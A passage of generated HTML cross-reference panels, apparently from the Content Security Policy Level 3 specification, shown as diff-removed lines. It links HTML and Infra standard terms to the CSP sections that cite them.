-   <a href="https://html.spec.whatwg.org/multipage/semantics.html#the-base-element">https://html.spec.whatwg.org/multipage/semantics.html#the-base-element</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-the-base-element">4.2. 
-    Integration with HTML </a>
-    <li><a href="#ref-for-the-base-element①">6.2.1. base-uri</a>
-    <li><a href="#ref-for-the-base-element②">6.2.1.1. 
-    Is base allowed for document? </a>
-    <li><a href="#ref-for-the-base-element③">7.3. Nonce Retargeting</a> <a href="#ref-for-the-base-element④">(2)</a> <a href="#ref-for-the-base-element⑤">(3)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-browsing-context">
-   <a href="https://html.spec.whatwg.org/multipage/browsers.html#browsing-context">https://html.spec.whatwg.org/multipage/browsers.html#browsing-context</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-browsing-context">2.3. Directives</a>
-    <li><a href="#ref-for-browsing-context①">4.2. 
-    Integration with HTML </a>
-    <li><a href="#ref-for-browsing-context②">4.2.5. 
-    Should navigation request of type from source in target be blocked
-    by Content Security Policy? </a>
-    <li><a href="#ref-for-browsing-context③">4.2.6. 
-    Should navigation response to navigation request of type from source
-    in target be blocked by Content Security Policy? </a>
-    <li><a href="#ref-for-browsing-context④">6.3.2.1. 
-    frame-ancestors Navigation Response Check </a> <a href="#ref-for-browsing-context⑤">(2)</a> <a href="#ref-for-browsing-context⑥">(3)</a>
-    <li><a href="#ref-for-browsing-context⑦">6.3.3.2. 
-    navigate-to Navigation Response Check </a> <a href="#ref-for-browsing-context⑧">(2)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-case-sensitive">
-   <a href="https://html.spec.whatwg.org/multipage/infrastructure.html#case-sensitive">https://html.spec.whatwg.org/multipage/infrastructure.html#case-sensitive</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-case-sensitive">6.6.1.1. 
-    Script directives pre-request check </a> <a href="#ref-for-case-sensitive①">(2)</a>
-    <li><a href="#ref-for-case-sensitive②">6.6.2.2. 
-    Does nonce match source list? </a>
-    <li><a href="#ref-for-case-sensitive③">6.6.2.9. 
-    port-part matching </a>
-    <li><a href="#ref-for-case-sensitive④">6.6.2.10. 
-    path-part matching </a>
-    <li><a href="#ref-for-case-sensitive⑤">6.6.3.3. 
-    Does element match source list for type and source? </a> <a href="#ref-for-case-sensitive⑥">(2)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-attr-meta-content">
-   <a href="https://html.spec.whatwg.org/multipage/semantics.html#attr-meta-content">https://html.spec.whatwg.org/multipage/semantics.html#attr-meta-content</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-attr-meta-content">3.3. 
-    The &lt;meta> element </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-attr-meta-http-equiv-content-security-policy">
-   <a href="https://html.spec.whatwg.org/multipage/semantics.html#attr-meta-http-equiv-content-security-policy">https://html.spec.whatwg.org/multipage/semantics.html#attr-meta-http-equiv-content-security-policy</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-attr-meta-http-equiv-content-security-policy">3.3. 
-    The &lt;meta> element </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-document-csp-list">
-   <a href="https://html.spec.whatwg.org/multipage/dom.html#concept-document-csp-list">https://html.spec.whatwg.org/multipage/dom.html#concept-document-csp-list</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-document-csp-list">4.2.1. 
-    Initialize a Document's CSP list </a> <a href="#ref-for-concept-document-csp-list①">(2)</a> <a href="#ref-for-concept-document-csp-list②">(3)</a> <a href="#ref-for-concept-document-csp-list③">(4)</a> <a href="#ref-for-concept-document-csp-list④">(5)</a> <a href="#ref-for-concept-document-csp-list⑤">(6)</a>
-    <li><a href="#ref-for-concept-document-csp-list⑥">4.2.3. 
-    Retrieve the CSP list of an object </a> <a href="#ref-for-concept-document-csp-list⑦">(2)</a>
-    <li><a href="#ref-for-concept-document-csp-list⑧">6.2.2.2. 
-    Should plugin element be blocked a priori by Content
-    Security Policy?: </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-current-settings-object">
-   <a href="https://html.spec.whatwg.org/multipage/webappapis.html#current-settings-object">https://html.spec.whatwg.org/multipage/webappapis.html#current-settings-object</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-current-settings-object">4.2.4. 
-    Should element’s inline type behavior be blocked by Content Security Policy? </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-attr-object-data">
-   <a href="https://html.spec.whatwg.org/multipage/iframe-embed-object.html#attr-object-data">https://html.spec.whatwg.org/multipage/iframe-embed-object.html#attr-object-data</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-attr-object-data">6.1.9. object-src</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-dom-document-2">
-   <a href="https://html.spec.whatwg.org/multipage/window-object.html#dom-document-2">https://html.spec.whatwg.org/multipage/window-object.html#dom-document-2</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-dom-document-2">2.4.1. 
-    Create a violation object for global, policy, and directive </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-parse-error-duplicate-attribute">
-   <a href="https://html.spec.whatwg.org/multipage/parsing.html#parse-error-duplicate-attribute">https://html.spec.whatwg.org/multipage/parsing.html#parse-error-duplicate-attribute</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-parse-error-duplicate-attribute">6.6.3.1. 
-    Is element nonceable? </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-the-embed-element">
-   <a href="https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-embed-element">https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-embed-element</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-the-embed-element">4.2. 
-    Integration with HTML </a>
-    <li><a href="#ref-for-the-embed-element①">6.1.9. object-src</a> <a href="#ref-for-the-embed-element②">(2)</a>
-    <li><a href="#ref-for-the-embed-element③">6.2.2. plugin-types</a> <a href="#ref-for-the-embed-element④">(2)</a>
-    <li><a href="#ref-for-the-embed-element⑤">6.3.2. frame-ancestors</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-environment-settings-object">
-   <a href="https://html.spec.whatwg.org/multipage/webappapis.html#environment-settings-object">https://html.spec.whatwg.org/multipage/webappapis.html#environment-settings-object</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-environment-settings-object">2.2. Policies</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-forced-sandboxing-flag-set">
-   <a href="https://html.spec.whatwg.org/multipage/origin.html#forced-sandboxing-flag-set">https://html.spec.whatwg.org/multipage/origin.html#forced-sandboxing-flag-set</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-forced-sandboxing-flag-set">6.2.3.2. 
-    sandbox Initialization </a> <a href="#ref-for-forced-sandboxing-flag-set①">(2)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-the-form-element">
-   <a href="https://html.spec.whatwg.org/multipage/forms.html#the-form-element">https://html.spec.whatwg.org/multipage/forms.html#the-form-element</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-the-form-element">6.3.3. navigate-to</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-frame">
-   <a href="https://html.spec.whatwg.org/multipage/obsolete.html#frame">https://html.spec.whatwg.org/multipage/obsolete.html#frame</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-frame">6.1.1. child-src</a> <a href="#ref-for-frame①">(2)</a>
-    <li><a href="#ref-for-frame②">6.3.2. frame-ancestors</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-settings-object-global">
-   <a href="https://html.spec.whatwg.org/multipage/webappapis.html#concept-settings-object-global">https://html.spec.whatwg.org/multipage/webappapis.html#concept-settings-object-global</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-settings-object-global">2.4.2. 
-    Create a violation object for request, and policy. </a>
-    <li><a href="#ref-for-concept-settings-object-global①">4.1.2. 
-    Report Content Security Policy violations for request </a>
-    <li><a href="#ref-for-concept-settings-object-global②">4.1.3. 
-    Should request be blocked by Content Security Policy? </a>
-    <li><a href="#ref-for-concept-settings-object-global③">4.1.4. 
-    Should response to request be blocked by Content Security Policy? </a>
-    <li><a href="#ref-for-concept-settings-object-global④">4.2.1. 
-    Initialize a Document's CSP list </a>
-    <li><a href="#ref-for-concept-settings-object-global⑤">4.2.4. 
-    Should element’s inline type behavior be blocked by Content Security Policy? </a>
-    <li><a href="#ref-for-concept-settings-object-global⑥">4.2.5. 
-    Should navigation request of type from source in target be blocked
-    by Content Security Policy? </a> <a href="#ref-for-concept-settings-object-global⑦">(2)</a> <a href="#ref-for-concept-settings-object-global⑧">(3)</a> <a href="#ref-for-concept-settings-object-global⑨">(4)</a>
-    <li><a href="#ref-for-concept-settings-object-global①⓪">4.2.6. 
-    Should navigation response to navigation request of type from source
-    in target be blocked by Content Security Policy? </a> <a href="#ref-for-concept-settings-object-global①①">(2)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-attr-base-href">
-   <a href="https://html.spec.whatwg.org/multipage/semantics.html#attr-base-href">https://html.spec.whatwg.org/multipage/semantics.html#attr-base-href</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-attr-base-href">4.2. 
-    Integration with HTML </a>
-    <li><a href="#ref-for-attr-base-href①">6.2.1.1. 
-    Is base allowed for document? </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-attr-meta-http-equiv">
-   <a href="https://html.spec.whatwg.org/multipage/semantics.html#attr-meta-http-equiv">https://html.spec.whatwg.org/multipage/semantics.html#attr-meta-http-equiv</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-attr-meta-http-equiv">3. 
-    Policy Delivery </a>
-    <li><a href="#ref-for-attr-meta-http-equiv①">3.3. 
-    The &lt;meta> element </a>
-    <li><a href="#ref-for-attr-meta-http-equiv②">4.2. 
-    Integration with HTML </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-the-iframe-element">
-   <a href="https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-iframe-element">https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-iframe-element</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-the-iframe-element">6.1.1. child-src</a> <a href="#ref-for-the-iframe-element①">(2)</a>
-    <li><a href="#ref-for-the-iframe-element②">6.2.3. sandbox</a> <a href="#ref-for-the-iframe-element③">(2)</a>
-    <li><a href="#ref-for-the-iframe-element④">6.3.2. frame-ancestors</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-initialise-the-document-object">
-   <a href="https://html.spec.whatwg.org/multipage/browsing-the-web.html#initialise-the-document-object">https://html.spec.whatwg.org/multipage/browsing-the-web.html#initialise-the-document-object</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-initialise-the-document-object">4.2. 
-    Integration with HTML </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-the-link-element">
-   <a href="https://html.spec.whatwg.org/multipage/semantics.html#the-link-element">https://html.spec.whatwg.org/multipage/semantics.html#the-link-element</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-the-link-element">3.3. 
-    The &lt;meta> element </a>
-    <li><a href="#ref-for-the-link-element①">6.1.14. style-src</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-meta">
-   <a href="https://html.spec.whatwg.org/multipage/semantics.html#meta">https://html.spec.whatwg.org/multipage/semantics.html#meta</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-meta">3. 
-    Policy Delivery </a>
-    <li><a href="#ref-for-meta①">3.2. 
-    The Content-Security-Policy-Report-Only HTTP Response Header Field </a>
-    <li><a href="#ref-for-meta②">3.3. 
-    The &lt;meta> element </a> <a href="#ref-for-meta③">(2)</a> <a href="#ref-for-meta④">(3)</a> <a href="#ref-for-meta⑤">(4)</a> <a href="#ref-for-meta⑥">(5)</a> <a href="#ref-for-meta⑦">(6)</a> <a href="#ref-for-meta⑧">(7)</a>
-    <li><a href="#ref-for-meta⑨">4.2. 
-    Integration with HTML </a>
-    <li><a href="#ref-for-meta①⓪">6.2.3. sandbox</a>
-    <li><a href="#ref-for-meta①①">6.3.2. frame-ancestors</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-nested-browsing-context">
-   <a href="https://html.spec.whatwg.org/multipage/browsers.html#nested-browsing-context">https://html.spec.whatwg.org/multipage/browsers.html#nested-browsing-context</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-nested-browsing-context">6.1.1. child-src</a> <a href="#ref-for-nested-browsing-context①">(2)</a>
-    <li><a href="#ref-for-nested-browsing-context②">6.1.5. frame-src</a>
-    <li><a href="#ref-for-nested-browsing-context③">6.1.9. object-src</a> <a href="#ref-for-nested-browsing-context④">(2)</a>
-    <li><a href="#ref-for-nested-browsing-context⑤">6.3.2.1. 
-    frame-ancestors Navigation Response Check </a> <a href="#ref-for-nested-browsing-context⑥">(2)</a>
-    <li><a href="#ref-for-nested-browsing-context⑦">6.7.1. 
-    Get the effective directive for request </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-browsing-context-nested-through">
-   <a href="https://html.spec.whatwg.org/multipage/browsers.html#browsing-context-nested-through">https://html.spec.whatwg.org/multipage/browsers.html#browsing-context-nested-through</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-browsing-context-nested-through">4.2. 
-    Integration with HTML </a>
-    <li><a href="#ref-for-browsing-context-nested-through①">6.3.2.1. 
-    frame-ancestors Navigation Response Check </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-attr-nonce">
-   <a href="https://html.spec.whatwg.org/multipage/urls-and-fetching.html#attr-nonce">https://html.spec.whatwg.org/multipage/urls-and-fetching.html#attr-nonce</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-attr-nonce">6.6.3.3. 
-    Does element match source list for type and source? </a>
-    <li><a href="#ref-for-attr-nonce①">7.2.2. Nonce exfiltration via content attributes</a>
-    <li><a href="#ref-for-attr-nonce②">8.2. 
-    Usage of "'strict-dynamic'" </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-the-object-element">
-   <a href="https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-object-element">https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-object-element</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-the-object-element">4.2. 
-    Integration with HTML </a>
-    <li><a href="#ref-for-the-object-element①">6.1.9. object-src</a> <a href="#ref-for-the-object-element②">(2)</a> <a href="#ref-for-the-object-element③">(3)</a> <a href="#ref-for-the-object-element④">(4)</a>
-    <li><a href="#ref-for-the-object-element⑤">6.2.2. plugin-types</a> <a href="#ref-for-the-object-element⑥">(2)</a>
-    <li><a href="#ref-for-the-object-element⑦">6.3.2. frame-ancestors</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-origin-opaque">
-   <a href="https://html.spec.whatwg.org/multipage/origin.html#concept-origin-opaque">https://html.spec.whatwg.org/multipage/origin.html#concept-origin-opaque</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-origin-opaque">2.2. Policies</a>
-    <li><a href="#ref-for-concept-origin-opaque①">4.2.1. 
-    Initialize a Document's CSP list </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-settings-object-origin">
-   <a href="https://html.spec.whatwg.org/multipage/webappapis.html#concept-settings-object-origin">https://html.spec.whatwg.org/multipage/webappapis.html#concept-settings-object-origin</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-settings-object-origin">2.2. Policies</a>
-    <li><a href="#ref-for-concept-settings-object-origin①">5.3. 
-    Report a violation </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-WorkerGlobalScope-owner-set">
-   <a href="https://html.spec.whatwg.org/#concept-WorkerGlobalScope-owner-set">https://html.spec.whatwg.org/#concept-WorkerGlobalScope-owner-set</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-WorkerGlobalScope-owner-set">4.2.2. 
-    Initialize a global object’s CSP list </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-parse-a-sandboxing-directive">
-   <a href="https://html.spec.whatwg.org/multipage/origin.html#parse-a-sandboxing-directive">https://html.spec.whatwg.org/multipage/origin.html#parse-a-sandboxing-directive</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-parse-a-sandboxing-directive">6.2.3.1. 
-    sandbox Response Check </a>
-    <li><a href="#ref-for-parse-a-sandboxing-directive①">6.2.3.2. 
-    sandbox Initialization </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-script-parse-error">
-   <a href="https://html.spec.whatwg.org/multipage/webappapis.html#concept-script-parse-error">https://html.spec.whatwg.org/multipage/webappapis.html#concept-script-parse-error</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-script-parse-error">6.6.3.1. 
-    Is element nonceable? </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-dom-a-ping">
-   <a href="https://html.spec.whatwg.org/multipage/text-level-semantics.html#dom-a-ping">https://html.spec.whatwg.org/multipage/text-level-semantics.html#dom-a-ping</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-dom-a-ping">6.1.2. connect-src</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-plugin-document">
-   <a href="https://html.spec.whatwg.org/multipage/browsing-the-web.html#plugin-document">https://html.spec.whatwg.org/multipage/browsing-the-web.html#plugin-document</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-plugin-document">6.1.9. object-src</a> <a href="#ref-for-plugin-document①">(2)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-prepare-a-script">
-   <a href="https://html.spec.whatwg.org/multipage/scripting.html#prepare-a-script">https://html.spec.whatwg.org/multipage/scripting.html#prepare-a-script</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-prepare-a-script">4.2. 
-    Integration with HTML </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-process-a-navigate-fetch">
-   <a href="https://html.spec.whatwg.org/multipage/browsing-the-web.html#process-a-navigate-fetch">https://html.spec.whatwg.org/multipage/browsing-the-web.html#process-a-navigate-fetch</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-process-a-navigate-fetch">4.2. 
-    Integration with HTML </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-process-a-navigate-response">
-   <a href="https://html.spec.whatwg.org/multipage/browsing-the-web.html#process-a-navigate-response">https://html.spec.whatwg.org/multipage/browsing-the-web.html#process-a-navigate-response</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-process-a-navigate-response">4.2. 
-    Integration with HTML </a>
-    <li><a href="#ref-for-process-a-navigate-response①">6.3.2.2. 
-		Relation to X-Frame-Options </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-process-the-iframe-attributes">
-   <a href="https://html.spec.whatwg.org/#process-the-iframe-attributes">https://html.spec.whatwg.org/#process-the-iframe-attributes</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-process-the-iframe-attributes">4.2.1. 
-    Initialize a Document's CSP list </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-queue-a-task">
-   <a href="https://html.spec.whatwg.org/multipage/webappapis.html#queue-a-task">https://html.spec.whatwg.org/multipage/webappapis.html#queue-a-task</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-queue-a-task">5.3. 
-    Report a violation </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-dom-document-referrer">
-   <a href="https://html.spec.whatwg.org/multipage/dom.html#dom-document-referrer">https://html.spec.whatwg.org/multipage/dom.html#dom-document-referrer</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-dom-document-referrer">2.4.1. 
-    Create a violation object for global, policy, and directive </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-relevant-settings-object">
-   <a href="https://html.spec.whatwg.org/multipage/webappapis.html#relevant-settings-object">https://html.spec.whatwg.org/multipage/webappapis.html#relevant-settings-object</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-relevant-settings-object">5.3. 
-    Report a violation </a> <a href="#ref-for-relevant-settings-object①">(2)</a> <a href="#ref-for-relevant-settings-object②">(3)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-run-a-worker">
-   <a href="https://html.spec.whatwg.org/multipage/workers.html#run-a-worker">https://html.spec.whatwg.org/multipage/workers.html#run-a-worker</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-run-a-worker">4.2. 
-    Integration with HTML </a>
-    <li><a href="#ref-for-run-a-worker①">6.1.1. child-src</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-attr-iframe-sandbox">
-   <a href="https://html.spec.whatwg.org/multipage/iframe-embed-object.html#attr-iframe-sandbox">https://html.spec.whatwg.org/multipage/iframe-embed-object.html#attr-iframe-sandbox</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-attr-iframe-sandbox">6.2.3. sandbox</a> <a href="#ref-for-attr-iframe-sandbox①">(2)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-sandboxed-origin-browsing-context-flag">
-   <a href="https://html.spec.whatwg.org/multipage/origin.html#sandboxed-origin-browsing-context-flag">https://html.spec.whatwg.org/multipage/origin.html#sandboxed-origin-browsing-context-flag</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-sandboxed-origin-browsing-context-flag">6.2.3.1. 
-    sandbox Response Check </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-sandboxed-scripts-browsing-context-flag">
-   <a href="https://html.spec.whatwg.org/multipage/origin.html#sandboxed-scripts-browsing-context-flag">https://html.spec.whatwg.org/multipage/origin.html#sandboxed-scripts-browsing-context-flag</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-sandboxed-scripts-browsing-context-flag">6.2.3.1. 
-    sandbox Response Check </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-origin-scheme">
-   <a href="https://html.spec.whatwg.org/multipage/origin.html#concept-origin-scheme">https://html.spec.whatwg.org/multipage/origin.html#concept-origin-scheme</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-origin-scheme">6.6.2.6. 
-    Does url match expression in origin with redirect count? </a> <a href="#ref-for-concept-origin-scheme①">(2)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-script">
-   <a href="https://html.spec.whatwg.org/multipage/scripting.html#script">https://html.spec.whatwg.org/multipage/scripting.html#script</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-script">1.3. Changes from Level 2</a> <a href="#ref-for-script①">(2)</a>
-    <li><a href="#ref-for-script②">3.3. 
-    The &lt;meta> element </a>
-    <li><a href="#ref-for-script③">6.1.11. script-src</a> <a href="#ref-for-script④">(2)</a> <a href="#ref-for-script⑤">(3)</a>
-    <li><a href="#ref-for-script⑥">6.6.3.1. 
-    Is element nonceable? </a> <a href="#ref-for-script⑦">(2)</a>
-    <li><a href="#ref-for-script⑧">6.6.3.3. 
-    Does element match source list for type and source? </a> <a href="#ref-for-script⑨">(2)</a>
-    <li><a href="#ref-for-script①⓪">7.2.1. Dangling markup attacks</a> <a href="#ref-for-script①①">(2)</a> <a href="#ref-for-script①②">(3)</a>
-    <li><a href="#ref-for-script①③">8.2. 
-    Usage of "'strict-dynamic'" </a> <a href="#ref-for-script①④">(2)</a> <a href="#ref-for-script①⑤">(3)</a>
-    <li><a href="#ref-for-script①⑥">8.4. 
-      Allowing external JavaScript via hashes </a> <a href="#ref-for-script①⑦">(2)</a> <a href="#ref-for-script①⑧">(3)</a> <a href="#ref-for-script①⑨">(4)</a> <a href="#ref-for-script②⓪">(5)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-set-the-frozen-base-url">
-   <a href="https://html.spec.whatwg.org/multipage/semantics.html#set-the-frozen-base-url">https://html.spec.whatwg.org/multipage/semantics.html#set-the-frozen-base-url</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-set-the-frozen-base-url">4.2. 
-    Integration with HTML </a>
-    <li><a href="#ref-for-set-the-frozen-base-url①">6.2.1. base-uri</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-dom-setinterval">
-   <a href="https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-setinterval">https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-setinterval</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-dom-setinterval">6.1.11. script-src</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-dom-settimeout">
-   <a href="https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-settimeout">https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-settimeout</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-dom-settimeout">6.1.11. script-src</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-source-browsing-context">
-   <a href="https://html.spec.whatwg.org/multipage/browsing-the-web.html#source-browsing-context">https://html.spec.whatwg.org/multipage/browsing-the-web.html#source-browsing-context</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-source-browsing-context">4.2.1. 
-    Initialize a Document's CSP list </a>
-    <li><a href="#ref-for-source-browsing-context①">7.8. 
-    CSP Inheriting to avoid bypasses </a> <a href="#ref-for-source-browsing-context②">(2)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-the-style-element">
-   <a href="https://html.spec.whatwg.org/multipage/semantics.html#the-style-element">https://html.spec.whatwg.org/multipage/semantics.html#the-style-element</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-the-style-element">6.1.14. style-src</a>
-    <li><a href="#ref-for-the-style-element①">6.6.3.3. 
-    Does element match source list for type and source? </a> <a href="#ref-for-the-style-element②">(2)</a>
-    <li><a href="#ref-for-the-style-element③">7.2.1. Dangling markup attacks</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-top-level-browsing-context">
-   <a href="https://html.spec.whatwg.org/multipage/browsers.html#top-level-browsing-context">https://html.spec.whatwg.org/multipage/browsers.html#top-level-browsing-context</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-top-level-browsing-context">6.1.9. object-src</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-attr-embed-type">
-   <a href="https://html.spec.whatwg.org/multipage/iframe-embed-object.html#attr-embed-type">https://html.spec.whatwg.org/multipage/iframe-embed-object.html#attr-embed-type</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-attr-embed-type">6.2.2. plugin-types</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-update-a-style-block">
-   <a href="https://html.spec.whatwg.org/multipage/semantics.html#update-a-style-block">https://html.spec.whatwg.org/multipage/semantics.html#update-a-style-block</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-update-a-style-block">4.2. 
-    Integration with HTML </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-set-append">
-   <a href="https://infra.spec.whatwg.org/#set-append">https://infra.spec.whatwg.org/#set-append</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-set-append">2.2.1. 
-    Parse a serialized CSP </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-ascii-case-insensitive">
-   <a href="https://infra.spec.whatwg.org/#ascii-case-insensitive">https://infra.spec.whatwg.org/#ascii-case-insensitive</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-ascii-case-insensitive">3.3. 
-    The &lt;meta> element </a>
-    <li><a href="#ref-for-ascii-case-insensitive①">4.3.1. 
-    EnsureCSPDoesNotBlockStringCompilation(callerRealm, calleeRealm, source) </a>
-    <li><a href="#ref-for-ascii-case-insensitive②">6.2.2.1. 
-    plugin-types Post-Request Check </a>
-    <li><a href="#ref-for-ascii-case-insensitive③">6.2.2.2. 
-    Should plugin element be blocked a priori by Content
-    Security Policy?: </a>
-    <li><a href="#ref-for-ascii-case-insensitive④">6.3.3.1. 
-    navigate-to Pre-Navigation Check </a>
-    <li><a href="#ref-for-ascii-case-insensitive⑤">6.3.3.2. 
-    navigate-to Navigation Response Check </a>
-    <li><a href="#ref-for-ascii-case-insensitive⑥">6.6.1.1. 
-    Script directives pre-request check </a>
-    <li><a href="#ref-for-ascii-case-insensitive⑦">6.6.2.5. 
-    Does url match source list in origin with redirect count? </a>
-    <li><a href="#ref-for-ascii-case-insensitive⑧">6.6.2.6. 
-    Does url match expression in origin with redirect count? </a>
-    <li><a href="#ref-for-ascii-case-insensitive⑨">6.6.2.7. 
